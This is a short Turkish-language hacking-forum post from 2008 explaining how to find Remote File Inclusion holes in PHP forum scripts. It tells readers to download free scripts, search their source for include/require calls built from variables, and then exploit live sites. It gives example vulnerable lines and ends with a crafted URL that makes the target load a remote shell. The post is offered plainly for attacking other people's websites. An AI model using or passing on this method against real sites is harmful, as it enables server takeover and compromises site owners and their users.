hacked MASTER
Mesaj Sayısı : 199 Kayıt tarihi : 08/03/08
| Konu: Rfi (Remote File İnclude) Açığı Bulma Salı Mart 11, 2008 12:22 am | |
| sizlere rfi açığı bulmayı anlatacağm bu dökümnda
öncelikle scriptten yararlanacaz açığı bulmak için
(script’i nerden bulacağınızı artık siz ayarlarsınız..)
şimdi işte free forum vs vs arıyorsunuz teker teker .. indiriyorsunuz scriptleri.
indirdiniz not defterinlen açıp (professionel not defteri daha uygun)
"require"
"include"
"include_once"
"require_once"
kodlarını arıyorsunuz ...
bunun gibi daha varda ben bilmiyorum..
neyse aradınız örnek veriyorum
/include/config.inc.php
de
include($lvc_include_dir.’lang/english.inc.php’;
bu kodu buldunuz hımm diyorsunuz denemek lazım sonra
bunu düzenliyorsunuz.
/include/config.inc.php?lvc_include_dir
diğer örnek
include ("$chemin/moteur/moteur_form.php";
include ("$chemin/moteur/moteur_tab_results.php";
düzenlenmiş hali sitenin sonuna bunu yapıştırıyorsunuz..
http://www.site.com/path/moteur.php?...=http://sh3LL? [/size] | |
|